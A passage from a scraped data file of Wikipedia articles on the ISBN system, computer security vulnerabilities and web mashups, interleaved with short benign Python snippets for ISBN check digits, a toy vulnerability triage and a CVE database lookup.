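
isbn = sbn_to_isbn10("340 01381 8")   # the SBN quoted in the text above
print(isbn, isbn10_is_valid(isbn))    # expected: 0340013818 True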
Some publishers, such as Ballantine Books, would sometimes use 12 digit SBNs where the last three digits indicated the price of the book; 12 for example, Woodstock Handmade Houses had a 12 digit Standard Book Number of 345 24223 8 595 (valid SBN: 345 24223 8, ISBN: 0 345 24223 8), 13 and it cost US$5.95. 14 Since 1 January 2007, ISBNs have contained thirteen digits, a format that is compatible with "Bookland" European Article Numbers, which have 13 digits. 3 The United States, with 3.9 million registered ISBNs in 2020, was by far the biggest user of the ISBN identifier in 2020, followed by the Republic of Korea (329,582), Germany (284,000), China (263,066), the UK (188,553) and Indonesia (144,793). Lifetime ISBNs registered in the United States are over 39 million as of 2020. 15 A separate ISBN is assigned to each edition and variation (except reprintings) of a publication. For example, an ebook, audiobook, paperback, and hardcover edition of the same book must each have a different ISBN assigned to it. 16 : 12 The ISBN is thirteen digits long if assigned on or after 1 January 2007, and ten digits long if assigned before 2007. c 3 An International Standard Book Number consists of four parts (if it is a 10 digit ISBN) or five parts (for a 13 digit ISBN). Section 5 of the International ISBN Agency's official user manual 16 : 11 describes the structure of the 13 digit ISBN, as follows: A 13 digit ISBN can be separated into its parts (prefix element, registration group, registrant, publication and check digit), and when this is done it is customary to separate the parts with hyphens or spaces. Separating the parts (registration group, registrant, publication and check digit) of a 10 digit ISBN is also done with either hyphens or spaces. Figuring out how to correctly separate a given ISBN is complicated, because most of the parts do not use a fixed number of digits. e ISBN issuance is country-specific, in that ISBNs are issued by the ISBN registration agency that is responsible for that country or territory regardless of the publication language. The ranges of ISBNs assigned to any particular country are based on the publishing profile of the country concerned, and so the ranges will vary depending on the number of books and the number, type, and size of publishers that are active. Some ISBN registration agencies are based in national libraries or within ministries of culture and thus may receive direct funding from the government to support their services. In other cases, the ISBN registration service is provided by organisations such as bibliographic data providers that are not government funded. 18 A full directory of ISBN agencies is available on the International ISBN Agency website. 19 A list for a few countries is given below: The ISBN registration group element is a 1 to 5 digit number that is valid within a single prefix element (i.e. one of 978 or 979), 16 : 11 and can be separated between hyphens, such as "978 1 ... . Registration groups have primarily been allocated within the 978 prefix element. 38 The single-digit registration groups within the 978 prefix element are: 0 or 1 for English-speaking countries; 2 for French-speaking countries; 3 for German-speaking countries; 4 for Japan; 5 for Russian-speaking countries; and 7 for People's Republic of China. Example 5 digit registration groups are 99936 and 99980, for Bhutan. The allocated registration groups are: 0 5, 600 631, 65, 7, 80 94, 950 989, 9910 9989, and 99901 99993. 
39 Books published in rare languages typically have longer group elements. 40 Within the 979 prefix element, the registration group 0 is reserved for compatibility with International Standard Music Numbers (ISMNs), but such material is not actually assigned an ISBN. 41 The registration groups within prefix element 979 that have been assigned are 8 for the United States of America, 10 for France, 11 for the Republic of Korea, and 12 for Italy. 42 The original 9 digit standard book number (SBN) had no registration group identifier, but prefixing a zero to a 9 digit SBN creates a valid 10 digit ISBN. The national ISBN agency assigns the registrant element (cf. Category:ISBN agencies) and an accompanying series of ISBNs within that registrant element to the publisher; the publisher then allocates one of the ISBNs to each of its books. In most countries, a book publisher is not legally required to assign an ISBN, although most large bookstores only handle publications that have ISBNs assigned to them. 43 44 45 The International ISBN Agency maintains the details of over one million ISBN prefixes and publishers in the Global Register of Publishers. 46 This database is freely searchable over the internet. Publishers receive blocks of ISBNs, with larger blocks allotted to publishers expecting to need them; a small publisher may receive ISBNs of one or more digits for the registration group identifier, several digits for the registrant, and a single digit for the publication element. Once that block of ISBNs is used, the publisher may receive another block of ISBNs, with a different registrant element. Consequently, a publisher may have different allotted registrant elements. There also may be more than one registration group identifier used in a country. This might occur once all the registrant elements from a particular registration group have been allocated to publishers. By using variable block lengths, registration agencies are able to customise the allocations of ISBNs that they make to publishers. For example, a large publisher may be given a block of ISBNs where fewer digits are allocated for the registrant element and many digits are allocated for the publication element; likewise, countries publishing many titles have few allocated digits for the registration group identifier and many for the registrant and publication elements. 47 Here are some sample ISBN 10 codes, illustrating block length variations. English-language registration group elements are 0 and 1 (2 of more than 220 registration group elements). These two registration group elements are divided into registrant elements in a systematic pattern, which allows their length to be determined, as follows: 17 A check digit is a form of redundancy check used for error detection, the decimal equivalent of a binary check bit. It consists of a single digit computed from the other digits in the number. The method for the 10 digit ISBN is an extension of that for SBNs, so the two systems are compatible; an SBN prefixed with a zero (the 10 digit ISBN) will give the same check digit as the SBN without the zero. The check digit is base eleven, and can be an integer between 0 and 9, or an 'X'. The system for 13 digit ISBNs is not compatible with SBNs and will, in general, give a different check digit from the corresponding 10 digit ISBN, so does not provide the same protection against transposition. This is because the 13 digit code was required to be compatible with the EAN format, and hence could not contain the letter 'X'. 
According to the 2001 edition of the International ISBN Agency's official user manual, 48 the ISBN 10 check digit (which is the last digit of the 10 digit ISBN) must range from 0 to 10 (the symbol 'X' is used for 10), and must be such that the sum of the ten digits, each multiplied by its (integer) weight, descending from 10 to 1, is a multiple of 11. That is, if xi is the ith digit, then x10 must be chosen such that 10x1 + 9x2 + 8x3 + 7x4 + 6x5 + 5x6 + 4x7 + 3x8 + 2x9 + x10 is a multiple of 11. For example, for an ISBN 10 of 0 306 40615 2: (10×0) + (9×3) + (8×0) + (7×6) + (6×4) + (5×0) + (4×6) + (3×1) + (2×5) + (1×2) = 132 = 12×11. Formally, using modular arithmetic, this is rendered 10x1 + 9x2 + 8x3 + 7x4 + 6x5 + 5x6 + 4x7 + 3x8 + 2x9 + x10 ≡ 0 (mod 11). It is also true for ISBN 10s that the sum of all ten digits, each multiplied by its weight in ascending order from 1 to 10, is a multiple of 11. For this example: (1×0) + (2×3) + (3×0) + (4×6) + (5×4) + (6×0) + (7×6) + (8×1) + (9×5) + (10×2) = 165 = 15×11. Formally, this is rendered x1 + 2x2 + 3x3 + 4x4 + 5x5 + 6x6 + 7x7 + 8x8 + 9x9 + 10x10 ≡ 0 (mod 11). The two most common errors in handling an ISBN (e.g. when typing it or writing it down) are a single altered digit or the transposition of adjacent digits. It can be proven mathematically that all pairs of valid ISBN 10s differ in at least two digits. It can also be proven that there are no pairs of valid ISBN 10s with eight identical digits and two transposed digits (these proofs are true because the ISBN is less than eleven digits long and because 11 is a prime number). The ISBN check digit method therefore ensures that it will always be possible to detect these two most common types of error, i.e., if either of these types of error has occurred, the result will never be a valid ISBN—the sum of the digits multiplied by their weights will never be a multiple of 11. However, if the error were to occur in the publishing house and remain undetected, the book would be issued with an invalid ISBN. 49 In contrast, it is possible for other types of error, such as two altered non-transposed digits, or three altered digits, to result in a valid ISBN (although it is still unlikely). Each of the first nine digits of the 10 digit ISBN—excluding the check digit itself—is multiplied by its (integer) weight, descending from 10 to 2, and the sum of these nine products is found. The value of the check digit is simply the one number between 0 and 10 which, when added to this sum, means the total is a multiple of 11. For example, the check digit for an ISBN 10 of 0 306 40615 ? is calculated as follows: (10×0) + (9×3) + (8×0) + (7×6) + (6×4) + (5×0) + (4×6) + (3×1) + (2×5) = 130. Adding 2 to 130 gives a multiple of 11 (because 132 = 12×11)—this is the only number between 0 and 10 which does so. Therefore, the check digit has to be 2, and the complete sequence is ISBN 0 306 40615 2. If the value of x10 required to satisfy this condition is 10, then an 'X' should be used. Alternatively, modular arithmetic is convenient for calculating the check digit using modulus 11. The remainder of this sum when it is divided by 11 (i.e. its value modulo 11) is computed. This remainder plus the check digit must equal either 0 or 11. Therefore, the check digit is (11 minus the remainder of the sum of the products modulo 11) modulo 11. Taking the remainder modulo 11 a second time accounts for the possibility that the first remainder is 0. Without the second modulo operation, the calculation could result in a check digit value of 11 - 0 = 11, which is invalid. (Strictly speaking, the first "modulo 11" is not needed, but it may be considered to simplify the calculation.) For example, the check digit for the ISBN of 0 306 40615 ? is calculated as follows: the weighted sum is 130, 130 modulo 11 is 9, and (11 - 9) modulo 11 is 2. Thus the check digit is 2. It is possible to avoid the multiplications in a software implementation by using two accumulators. 
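A short sketch of the ISBN-10 check-digit rule just described, using weights 10 down to 2 and the double modulo 11; the worked example is the 0 306 40615 ? ISBN from the text, and the function name is my own:

def isbn10_check_digit(first9: str) -> str:
    """Check digit for the first nine digits of an ISBN-10 (mod-11 rule above)."""
    digits = [int(c) for c in first9 if c.isdigit()]
    assert len(digits) == 9
    total = sum(w * d for w, d in zip(range(10, 1, -1), digits))  # weights 10..2
    check = (11 - total % 11) % 11       # second modulo handles a remainder of 0
    return "X" if check == 10 else str(check)

print(isbn10_check_digit("0 306 40615"))  # -> '2', giving ISBN 0 306 40615 2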
Repeatedly adding t into s computes the necessary multiples: after the ith digit has been added, t holds x1 + x2 + … + xi and s holds i·x1 + (i-1)·x2 + … + 1·xi, so that after all ten digits s equals 10x1 + 9x2 + … + x10, the mod-11 checksum. The modular reduction can be done once at the end, as shown above (in which case s could hold a value as large as 496, for the invalid ISBN 99999 999 9 X), or s and t could be reduced by a conditional subtract after each addition. Appendix 1 of the International ISBN Agency's official user manual 16 : 33 describes how the 13 digit ISBN check digit is calculated. The ISBN 13 check digit, which is the last digit of the ISBN, must range from 0 to 9 and must be such that the sum of all the thirteen digits, each multiplied by its (integer) weight, alternating between 1 and 3, is a multiple of 10. As ISBN 13 is a subset of EAN 13, the algorithm for calculating the check digit is exactly the same for both. Formally, using modular arithmetic, this is rendered: x1 + 3x2 + x3 + 3x4 + x5 + 3x6 + x7 + 3x8 + x9 + 3x10 + x11 + 3x12 + x13 ≡ 0 (mod 10). The calculation of an ISBN 13 check digit begins with the first twelve digits of the 13 digit ISBN (thus excluding the check digit itself). Each digit, from left to right, is alternately multiplied by 1 or 3, then those products are summed modulo 10 to give a value ranging from 0 to 9. Subtracted from 10, that leaves a result from 1 to 10. A zero replaces a ten, so, in all cases, a single check digit results. For example, the ISBN 13 check digit of 978 0 306 40615 ? is calculated as follows: (1×9) + (3×7) + (1×8) + (3×0) + (1×3) + (3×0) + (1×6) + (3×4) + (1×0) + (3×6) + (1×1) + (3×5) = 93; 93 modulo 10 is 3, and 10 - 3 = 7. Thus, the check digit is 7, and the complete sequence is ISBN 978 0 306 40615 7. In general, the ISBN check digit is calculated as follows. Let s = x1 + 3x2 + x3 + 3x4 + … + x11 + 3x12. Then the check digit is x13 = (10 - (s mod 10)) mod 10. This check system—similar to the UPC check digit formula—does not catch all errors of adjacent digit transposition. Specifically, if the difference between two adjacent digits is 5, the check digit will not catch their transposition. For instance, the above example allows this situation with the 6 followed by a 1. The correct order contributes 3×6 + 1×1 = 19 to the sum; while, if the digits are transposed (1 followed by a 6), the contribution of those two digits will be 3×1 + 1×6 = 9. However, 19 and 9 are congruent modulo 10, and so produce the same final result: both ISBNs will have a check digit of 7. The ISBN 10 formula uses the prime modulus 11 which avoids this blind spot, but requires more than the digits 0 to 9 to express the check digit. Additionally, if the sum of the 2nd, 4th, 6th, 8th, 10th, and 12th digits is tripled then added to the remaining digits (1st, 3rd, 5th, 7th, 9th, 11th, and 13th), the total will always be divisible by 10 (i.e., end in 0). A 10 digit ISBN is converted to a 13 digit ISBN by prepending "978" to the ISBN 10 and recalculating the final checksum digit using the ISBN 13 algorithm. The reverse process can also be performed, but not for numbers commencing with a prefix other than 978, which have no 10 digit equivalent. Publishers and libraries have varied policies about the use of the ISBN check digit. Publishers sometimes fail to check the correspondence of a book title and its ISBN before publishing it; that failure causes book identification problems for libraries, booksellers, and readers. 50 For example, ISBN 0 590 76484 5 is shared by two books—Ninja gaiden: a novel based on the best-selling game by Tecmo (1990) and Wacky laws (1997), both published by Scholastic. Most libraries and booksellers display the book record for an invalid ISBN issued by the publisher. The Library of Congress catalogue contains books published with invalid ISBNs, which it usually tags with the phrase "Cancelled ISBN". 
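The two-accumulator trick, the ISBN-13 check digit, and the 978-prefix conversion described above can be sketched as follows; the function names are my own, and the test values are the examples used in the text:

def isbn10_valid_two_accumulators(isbn10: str) -> bool:
    """Mod-11 validation without multiplications: repeatedly adding t into s
    builds the weighted sum 10*x1 + 9*x2 + ... + 1*x10."""
    vals = [10 if c.upper() == "X" else int(c) for c in isbn10 if c.isalnum()]
    s = t = 0
    for d in vals:
        t += d
        s += t
    return s % 11 == 0

def isbn13_check_digit(first12: str) -> str:
    """Check digit for the first twelve digits, weights alternating 1 and 3."""
    digits = [int(c) for c in first12 if c.isdigit()]
    total = sum(d * (1 if i % 2 == 0 else 3) for i, d in enumerate(digits))
    return str((10 - total % 10) % 10)

def isbn10_to_isbn13(isbn10: str) -> str:
    """Prepend 978 and recalculate the final digit with the ISBN-13 rule."""
    body = "978" + "".join(c for c in isbn10 if c.isalnum())[:9]
    return body + isbn13_check_digit(body)

print(isbn10_valid_two_accumulators("0306406152"))  # True
print(isbn13_check_digit("978030640615"))           # '7'
print(isbn10_to_isbn13("0306406152"))               # '9780306406157'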
51 The International Union Library Catalog (a.k.a., WorldCat OCLC—Online Computer Library Center system) often indexes by invalid ISBNs, if the book is indexed in that way by a member library. 52 Only the term "ISBN" should be used; the terms "eISBN" and "e-ISBN" have historically been sources of confusion and should be avoided. If a book exists in one or more digital (e-book) formats, each of those formats must have its own ISBN. In other words, each of the three separate EPUB, Amazon Kindle, and PDF formats of a particular book will have its own specific ISBN. They should not share the ISBN of the paper version, and there is no generic "eISBN" which encompasses all the e-book formats for a title. 53 The barcodes on a book's back cover (or inside a mass-market paperback book's front cover) are EAN 13; they may have a separate barcode encoding five digits called an EAN 5 for the currency and the recommended retail price. 54 For 10 digit ISBNs, the number "978", the Bookland "country code", is prefixed to the ISBN in the barcode data, and the check digit is recalculated according to the EAN 13 formula (modulo 10, 1 and 3 weighting on alternating digits). Partly because of an expected shortage in certain ISBN categories, the International Organization for Standardization (ISO) decided to migrate to a 13 digit ISBN (ISBN 13). The process began on 1 January 2005 and was planned to conclude on 1 January 2007. 55 As of 2011 update , all the 13 digit ISBNs began with 978. As the 978 ISBN supply is exhausted, the 979 prefix was introduced. Part of the 979 prefix is reserved for use with the Musicland code for musical scores with an ISMN. The 10 digit ISMN codes differed visually as they began with an "M" letter; the bar code represents the "M" as a zero, and for checksum purposes it counted as a 3. All ISMNs are now thirteen digits commencing 979 0; 979 1 to 979 9 will be used by ISBN. Publisher identification code numbers are unlikely to be the same in the 978 and 979 ISBNs, likewise, there is no guarantee that language area code numbers will be the same. Moreover, the 10 digit ISBN check digit generally is not the same as the 13 digit ISBN check digit. Because the GTIN 13 is part of the Global Trade Item Number (GTIN) system (that includes the GTIN 14, the GTIN 12, and the GTIN 8), the 13 digit ISBN falls within the 14 digit data field range. 56 Barcode format compatibility is maintained, because (aside from the group breaks) the ISBN 13 barcode format is identical to the EAN barcode format of existing 10 digit ISBNs. So, migration to an EAN-based system allows booksellers the use of a single numbering system for both books and non-book products that is compatible with existing ISBN based data, with only minimal changes to information technology systems. Hence, many booksellers (e.g., Barnes Noble) migrated to EAN barcodes as early as March 2005. Although many American and Canadian booksellers were able to read EAN 13 barcodes before 2005, most general retailers could not read them. The upgrading of the UPC barcode system to full EAN 13, in 2005, eased migration to the ISBN in North America. |
467 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Vulnerability_(computing) | Vulnerabilities are flaws in a computer system that weaken the overall security of the system. Despite intentions to achieve complete correctness, virtually all hardware and software contains bugs where the system does not behave as expected. If the bug could enable an attacker to compromise the confidentiality, integrity, or availability of system resources, it is called a vulnerability. Insecure software development practices as well as design factors such as complexity can increase the burden of vulnerabilities. There are different types most common in different components such as hardware, operating systems, and applications. Vulnerability management is a process that includes identifying systems and prioritizing which are most important, scanning for vulnerabilities, and taking action to secure the system. Vulnerability management typically is a combination of remediation (fixing the vulnerability), mitigation (increasing the difficulty or reducing the danger of exploits), and accepting risks that are not economical or practical to eliminate. Vulnerabilities can be scored for risk according to the Common Vulnerability Scoring System or other systems, and added to vulnerability databases. As of 2023 update , there are more than 20 million vulnerabilities catalogued in the Common Vulnerabilities and Exposures (CVE) database. A vulnerability is initiated when it is introduced into hardware or software. It becomes active and exploitable when the software or hardware containing the vulnerability is running. The vulnerability may be discovered by the vendor or a third party. Disclosing the vulnerability (as a patch or otherwise) is associated with an increased risk of compromise because attackers often move faster than patches are rolled out. Regardless of whether a patch is ever released to remediate the vulnerability, its lifecycle will eventually end when the system, or older versions of it, fall out of use. Despite developers' goal of delivering a product that works entirely as intended, virtually all software and hardware contains bugs. 1 If a bug creates a security risk, it is called a vulnerability. 2 3 4 Software patches are often released to fix identified vulnerabilities, but those that remain unknown (zero days) as well as those that have not been patched are still liable for exploitation. 5 Vulnerabilities vary in their ability to be exploited by malicious actors, 2 and the actual risk is dependent on the nature of the vulnerability as well as the value of the surrounding system. 6 Although some vulnerabilities can only be used for denial of service attacks, more dangerous ones allow the attacker to inject and run their own code (called malware), without the user being aware of it. 2 Only a minority of vulnerabilities allow for privilege escalation, which is necessary for more severe attacks. 7 Without a vulnerability, the exploit cannot gain access. 8 It is also possible for malware to be installed directly, without an exploit, if the attacker uses social engineering or implants the malware in legitimate software that is downloaded deliberately. 9 Fundamental design factors that can increase the burden of vulnerabilities include: Some software development practices can affect the risk of vulnerabilities being introduced to a code base. 
Lack of knowledge about secure software development or excessive pressure to deliver features quickly can lead to avoidable vulnerabilities to enter production code, especially if security is not prioritized by the company culture. This can lead to unintended vulnerabilities. The more complex the system is, the easier it is for vulnerabilities to go undetected. Some vulnerabilities are deliberately planted, which could be for any reason from a disgruntled employee selling access to hackers, to sophisticated state-sponsored schemes to introduce vulnerabilities to software. 14 Inadequate code reviews can lead to missed bugs, but there are also static code analysis tools that can be used as part of code reviews and may find some vulnerabilities. 15 DevOps, a development workflow that emphasizes automated testing and deployment to speed up the deployment of new features, often requires that many developers be granted access to change configurations, which can lead to deliberate or inadvertent inclusion of vulnerabilities. 16 Compartmentalizing dependencies, which is often part of DevOps workflows, can reduce the attack surface by paring down dependencies to only what is necessary. 17 If software as a service is used, rather than the organization's own hardware and software, the organization is dependent on the cloud services provider to prevent vulnerabilities. 18 The National Vulnerability Database classifies vulnerabilities into eight root causes that may be overlapping, including: 19 Deliberate security bugs can be introduced during or after manufacturing and cause the integrated circuit not to behave as expected under certain specific circumstances. Testing for security bugs in hardware is quite difficult due to limited time and the complexity of twenty-first century chips, 22 while the globalization of design and manufacturing has increased the opportunity for these bugs to be introduced by malicious actors. 23 Although operating system vulnerabilities vary depending on the operating system in use, a common problem is privilege escalation bugs that enable the attacker to gain more access than they should be allowed. Open-source operating systems such as Linux and Android have a freely accessible source code and allow anyone to contribute, which could enable the introduction of vulnerabilities. However, the same vulnerabilities also occur in proprietary operating systems such as Microsoft Windows and Apple operating systems. 24 All reputable vendors of operating systems provide patches regularly. 25 Client server applications are downloaded onto the end user's computers and are typically updated less frequently than web applications. Unlike web applications, they interact directly with a user's operating system. Common vulnerabilities in these applications include: 26 Web applications run on many websites. Because they are inherently less secure than other applications, they are a leading source of data breaches and other security incidents. 27 28 Common types of vulnerabilities found in these applications include: There is little evidence about the effectiveness and cost-effectiveness of different cyberattack prevention measures. 31 Although estimating the risk of an attack is not straightforward, the mean time to breach and expected cost can be considered to determine the priority for remediating or mitigating an identified vulnerability and whether it is cost effective to do so. 
32 Although attention to security can reduce the risk of attack, achieving perfect security for a complex system is impossible, and many security measures have unacceptable cost or usability downsides. 33 For example, reducing the complexity and functionality of the system is effective at reducing the attack surface. 34 Successful vulnerability management usually involves a combination of remediation (closing a vulnerability), mitigation (increasing the difficulty, and reducing the consequences, of exploits), and accepting some residual risk. Often a defense in depth strategy is used for multiple barriers to attack. 35 Some organizations scan for only the highest-risk vulnerabilities as this enables prioritization in the context of lacking the resources to fix every vulnerability. 36 Increasing expenses is likely to have diminishing returns. 32 Remediation fixes vulnerabilities, for example by downloading a software patch. 37 Software vulnerability scanners are typically unable to detect zero-day vulnerabilities, but are more effective at finding known vulnerabilities based on a database. These systems can find some known vulnerabilities and advise fixes, such as a patch. 38 39 However, they have limitations including false positives. 37 Vulnerabilities can only be exploited when they are active-the software in which they are embedded is actively running on the system. 40 Before the code containing the vulnerability is configured to run on the system, it is considered a carrier. 41 Dormant vulnerabilities can run, but are not currently running. Software containing dormant and carrier vulnerabilities can sometimes be uninstalled or disabled, removing the risk. 42 Active vulnerabilities, if distinguished from the other types, can be prioritized for patching. 40 Vulnerability mitigation is measures that do not close the vulnerability, but make it more difficult to exploit or reduce the consequences of an attack. 43 Reducing the attack surface, particularly for parts of the system with root (administrator) access, and closing off opportunities for exploits to engage in privilege exploitation is a common strategy for reducing the harm that a cyberattack can cause. 37 If a patch for third-party software is unavailable, it may be possible to temporarily disable the software. 44 A penetration test attempts to enter the system via an exploit to see if the system is insecure. 45 If a penetration test fails, it does not necessarily mean that the system is secure. 46 Some penetration tests can be conducted with automated software that tests against existing exploits for known vulnerabilities. 47 Other penetration tests are conducted by trained hackers. Many companies prefer to contract out this work as it simulates an outsider attack. 46 The vulnerability lifecycle begins when vulnerabilities are introduced into hardware or software. 48 Detection of vulnerabilities can be by the software vendor, or by a third party. In the latter case, it is considered most ethical to immediately disclose the vulnerability to the vendor so it can be fixed. 49 Government or intelligence agencies buy vulnerabilities that have not been publicly disclosed and may use them in an attack, stockpile them, or notify the vendor. 50 As of 2013, the Five Eyes (United States, United Kingdom, Canada, Australia, and New Zealand) captured the plurality of the market and other significant purchasers included Russia, India, Brazil, Malaysia, Singapore, North Korea, and Iran. 
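As a toy illustration of that prioritisation (the records below are invented, not real scanner output), active vulnerabilities are queued first and ordered by CVSS score, mirroring the practice of remediating the highest-risk running code before dormant or carrier findings:

# Toy illustration of vulnerability triage; the records are made up.
findings = [
    {"id": "VULN-1", "cvss": 9.8, "state": "active"},   # running code, critical
    {"id": "VULN-2", "cvss": 5.4, "state": "dormant"},  # installed but not running
    {"id": "VULN-3", "cvss": 7.1, "state": "active"},
    {"id": "VULN-4", "cvss": 3.2, "state": "carrier"},  # present, not configured to run
]

# Active vulnerabilities first, highest CVSS score first.
queue = sorted(
    (f for f in findings if f["state"] == "active"),
    key=lambda f: f["cvss"],
    reverse=True,
)
for f in queue:
    print(f"remediate {f['id']} (CVSS {f['cvss']})")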
51 Organized criminal groups also buy vulnerabilities, although they typically prefer exploit kits. 52 Even vulnerabilities that are publicly known or patched are often exploitable for an extended period. 53 54 Security patches can take months to develop, 55 or may never be developed. 54 A patch can have negative effects on the functionality of software 54 and users may need to test the patch to confirm functionality and compatibility. 56 Larger organizations may fail to identify and patch all dependencies, while smaller enterprises and personal users may not install patches. 54 Research suggests that risk of cyberattack increases if the vulnerability is made publicly known or a patch is released. 57 Cybercriminals can reverse engineer the patch to find the underlying vulnerability and develop exploits, 58 often faster than users install the patch. 57 Vulnerabilities become deprecated when the software or vulnerable versions fall out of use. 49 This can take an extended period of time; in particular, industrial software may not be feasible to replace even if the manufacturer stops supporting it. 59 A commonly used scale for assessing the severity of vulnerabilities is the open-source specification Common Vulnerability Scoring System (CVSS). CVSS evaluates the possibility to exploit the vulnerability and compromise data confidentiality, availability, and integrity. It also considers how the vulnerability could be used and how complex an exploit would need to be. The amount of access needed for exploitation and whether it could take place without user interaction are also factored in to the overall score. 60 61 Someone who discovers a vulnerability may disclose it immediately (full disclosure) or wait until a patch has been developed (responsible disclosure, or coordinated disclosure). The former approach is praised for its transparency, but the drawback is that the risk of attack is likely to be increased after disclosure with no patch available. 62 Some vendors pay bug bounties to those who report vulnerabilities to them. 63 64 Not all companies respond positively to disclosures, as they can cause legal liability and operational overhead. 65 There is no law requiring disclosure of vulnerabilities. 66 If a vulnerability is discovered by a third party that does not disclose to the vendor or the public, it is called a zero-day vulnerability, often considered the most dangerous type because fewer defenses exist. 67 The most commonly used vulnerability dataset is Common Vulnerabilities and Exposures (CVE), maintained by Mitre Corporation. 68 As of 2023 update , it has over 20 million entries. 38 This information is shared into other databases, including the United States' National Vulnerability Database, 68 where each vulnerability is given a risk score using Common Vulnerability Scoring System (CVSS), Common Platform Enumeration (CPE) scheme, and Common Weakness Enumeration. citation needed CVE and other databases typically do not track vulnerabilities in software as a service products. 38 Submitting a CVE is voluntary for companies that discovered a vulnerability. 66 The software vendor is usually not legally liable for the cost if a vulnerability is used in an attack, which creates an incentive to make cheaper but less secure software. 69 Some companies are covered by laws, such as PCI, HIPAA, and Sarbanes-Oxley, that place legal requirements on vulnerability management. 70 |
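The CVE records mentioned here can also be retrieved programmatically. The sketch below queries the public NVD CVE API (the v2.0 endpoint and its cveId parameter are taken from NVD's published documentation and should be verified before relying on them) and prints the start of the raw JSON rather than assuming any particular field layout:

import json
import requests

# NVD's public CVE API (v2.0); endpoint and parameter name per NVD documentation.
NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"

def fetch_cve(cve_id: str) -> dict:
    resp = requests.get(NVD_URL, params={"cveId": cve_id}, timeout=30)
    resp.raise_for_status()
    return resp.json()

record = fetch_cve("CVE-2021-44228")       # Log4Shell, used only as an example ID
print(json.dumps(record, indent=2)[:800])  # show the start of the raw record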
468 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Mashup_(web_application_hybrid) | A mashup (computer industry jargon), in web development, is a web page or web application that uses content from more than one source to create a single new service displayed in a single graphical interface. For example, a user could combine the addresses and photographs of their library branches with a Google map to create a map mashup. 1 The term implies easy, fast integration, frequently using open application programming interfaces (open API) and data sources to produce enriched results that were not necessarily the original reason for producing the raw source data. The term mashup originally comes from creating something by combining elements from two or more sources. 2 The main characteristics of a mashup are combination, visualization, and aggregation. It is important to make existing data more useful, for personal and professional use. To be able to permanently access the data of other services, mashups are generally client applications or hosted online. In the past years when? , more and more Web applications have published APIs that enable software developers to easily integrate data and functions the SOA way, instead of building them by themselves. Mashups can be considered to have an active role in the evolution of social software and Web 2.0. Mashup composition tools are usually simple enough to be used by end-users. They generally do not require programming skills and rather support visual wiring of GUI widgets, services and components together. Therefore, these tools contribute to a new vision of the Web, where users are able to contribute. clarification needed The term "mashup" is not formally defined by any standard-setting body. 3 The broader context of the history of the Web provides a background for the development of mashups. Under the Web 1.0 model, organizations stored consumer data on portals and updated them regularly. They controlled all the consumer data, and the consumer had to use their products and services to get the information. citation needed The advent of Web 2.0 introduced Web standards that were commonly and widely adopted across traditional competitors and which unlocked the consumer data. At the same time, mashups emerged, allowing mixing and matching competitors' APIs to develop new services. The first mashups used mapping services or photo services to combine these services with data of any kind and therefore to produce visualizations of data. 4 failed verification In the beginning, most mashups were consumer-based, but recently when? the mashup is to be seen by whom? as an interesting concept useful also to enterprises. Business mashups can combine existing internal data with external services to generate new views on the data. There was also the free Yahoo Pipes to build mashups for free using the Yahoo Query Language. There are many types of mashup, such as business mashups, consumer mashups, and data mashups. 5 The most common type of mashup is the consumer mashup, aimed at the general public. Mashups can also be categorized by the basic API type they use but any of these can be combined with each other or embedded into other applications. In technology, a mashup enabler is a tool for transforming incompatible IT resources into a form that allows them to be easily combined, in order to create a mashup. 
Mashup enablers allow powerful techniques and tools (such as mashup platforms) for combining data and services to be applied to new kinds of resources. An example of a mashup enabler is a tool for creating an RSS feed from a spreadsheet (which cannot easily be used to create a mashup). Many mashup editors include mashup enablers, for example, Presto Mashup Connectors, Convertigo Web Integrator or Caspio Bridge. Mashup enablers have also been described as "the service and tool providers, sic that make mashups possible". citation needed Early mashups were developed manually by enthusiastic programmers. However, as mashups became more popular, companies began creating platforms for building mashups, which allow designers to visually construct mashups by connecting together mashup components. Mashup editors have greatly simplified the creation of mashups, significantly increasing the productivity of mashup developers and even opening mashup development to end-users and non-IT experts. Standard components and connectors enable designers to combine mashup resources in all sorts of complex ways with ease. Mashup platforms, however, have done little to broaden the scope of resources accessible by mashups and have not freed mashups from their reliance on well-structured data and open libraries (RSS feeds and public APIs). Mashup enablers evolved to address this problem, providing the ability to convert other kinds of data and services into mashable resources. Of course, not all valuable data is located within organizations. In fact, the most valuable information for business intelligence and decision support is often external to the organization. With the emergence of rich web applications and online Web portals, a wide range of business-critical processes (such as ordering) are becoming available online. Unfortunately, very few of these data sources syndicate content in RSS format and very few of these services provide publicly accessible APIs. Mashup editors therefore solve this problem by providing enablers or connectors. Mashups and portals are both content aggregation technologies. Portals are an older technology designed as an extension to traditional dynamic Web applications, in which the process of converting data content into marked-up Web pages is split into two phases: generation of markup "fragments" and aggregation of the fragments into pages. Each markup fragment is generated by a "portlet", and the portal combines them into a single Web page. Portlets may be hosted locally on the portal server or remotely on a separate server. Portal technology defines a complete event model covering reads and updates. A request for an aggregate page on a portal is translated into individual read operations on all the portlets that form the page ("render" operations on local, JSR 168 portlets or "getMarkup" operations on remote, WSRP portlets). If a submit button is pressed on any portlet on a portal page, it is translated into an update operation on that portlet alone (processAction on a local portlet or performBlockingInteraction on a remote, WSRP portlet). The update is then immediately followed by a read on all portlets on the page. Portal technology is about server-side, presentation-tier aggregation. It cannot be used to drive more robust forms of application integration such as two-phase commit. Mashups differ from portals in the following respects: The portal model has been around longer and has had greater investment and product research. 
Portal technology is therefore more standardized and mature. Over time, increasing maturity and standardization of mashup technology will likely make it more popular than portal technology because it is more closely associated with Web 2.0 and lately Service-oriented Architectures (SOA). 7 New versions of portal products are expected to eventually add mashup support while still supporting legacy portlet applications. Mashup technologies, in contrast, are not expected to provide support for portal standards. Mashup uses are expanding in the business environment. Business mashups are useful for integrating business and data services, as business mashups technologies provide the ability to develop new integrated services quickly, to combine internal services with external or personalized information, and to make these services tangible to the business user through user-friendly Web browser interfaces. 8 Business mashups differ from consumer mashups in the level of integration with business computing environments, security and access control features, governance, and the sophistication of the programming tools (mashup editors) used. Another difference between business mashups and consumer mashups is a growing trend of using business mashups in commercial software as a service (SaaS) offering. Many of the providers of business mashups technologies have added SOA features. The architecture of a mashup is divided into three layers: Architecturally, there are two styles of mashups: Web-based and server-based. Whereas Web-based mashups typically use the user's web browser to combine and reformat the data, server-based mashups analyze and reformat the data on a remote server and transmit the data to the user's browser in its final form. 9 